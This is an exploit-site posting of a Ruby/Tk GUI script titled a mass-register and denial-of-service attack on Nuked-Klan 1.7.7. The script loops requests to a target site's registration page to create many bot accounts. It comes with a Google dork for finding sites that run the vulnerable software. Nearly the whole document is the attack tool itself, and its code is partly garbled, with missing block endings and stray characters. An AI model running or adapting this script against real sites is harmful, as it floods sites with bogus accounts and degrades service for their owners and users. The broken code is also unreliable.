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Nuked-Klan 1.7.7 Mass Register & Denial Of Service

Whivack Gsk
Security Risk Unsored
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Nuked-Klan 1.7.7 Mass Register & Denial Of Service

# usr/bin/env Ruby
# Mass Register, Denial Of Service Attack On Nuked-Klan 1.7.7
# 23/04/10
# Code By, Whivack and thanks at "Gsk? | Callo" for help and "Gsk? | Alg3ri4n" for idea
# ActiveTcl 8.4 and Ruby 1.8.6
# V 2.0 GUI
# WebApps/0day
# Dork Google By Gsk? | Callo : "Powered by Nuked-Klan 1.7.7 ? 2002, 2008"
# Contact Me At : whivackandninpa@gmail.com
# Visit http://gsk2.org/

require 'net/http'
require 'net/https'
require 'tk'

root = TkRoot.new {
? title "Code, By Whivack"
TkLabel.new( root ) {
text "Website :"
pack( {'padx' => 10, 'pady' => 10} )
site = TkEntry.new( root ) {
pack( { "side" => "top" } )
TkLabel.new( root ) {
text "Number Register : < 100"
pack( {'padx' => 10, 'pady' => 10} )
nbr = TkEntry.new( root ) {
pack( { "side" => "top" } )
TkLabel.new( root ) {
text "Bot Name :"
pack( {'padx' => 10, 'pady' => 10} )
pseudo = TkEntry.new( root ) {
pack( { "side" => "top" } )
attack = TkButton.new( root ) {
? text "Send"
? pack( { "side" => "bottom" } )
TkLabel.new( root ) {
text "Code By Whivack, Thanks Gsk? | Alg3ri4n For Idea And Gsk? | Callo For Help"
pack( {'padx' => 10, 'pady' => 10} )
var = 0
nombre = TkVariable.new
pseu = TkVariable.new
nbr.textvariable = nombre
pseudo.textvariable = pseu
cible = TkVariable.new
site.textvariable = cible
attack.bind( "1", proc {
while var < nombre
? var +=1
http = Net::HTTP.new("#{cible}", 80)
http.use_ssl = false
path = '/index.php?file=User&op=reg'
resp, data = http.get(path, nil)
cookie = resp.response['set-cookie']
pse = "#{pseu}" + "#{var}"
data = "pseudo=#{pse}&pass_reg=test&pass_conf=test&mail=#{pse}@gmail.fr&email=&country=France.gif&game=1"
headers = {
? 'Cookie' => cookie,
? 'Referer' => "http://#{cible}/index.php",
? 'Content-Type' => 'application/x-www-form-urlencoded'
resp, data = http.post(path, data, headers)
puts 'Code = ' + resp.code
puts 'Message = ' + resp.message
resp.each {|key, val| puts key + ' = ' + val}
puts data

#  0day.today [2024-10-06]  #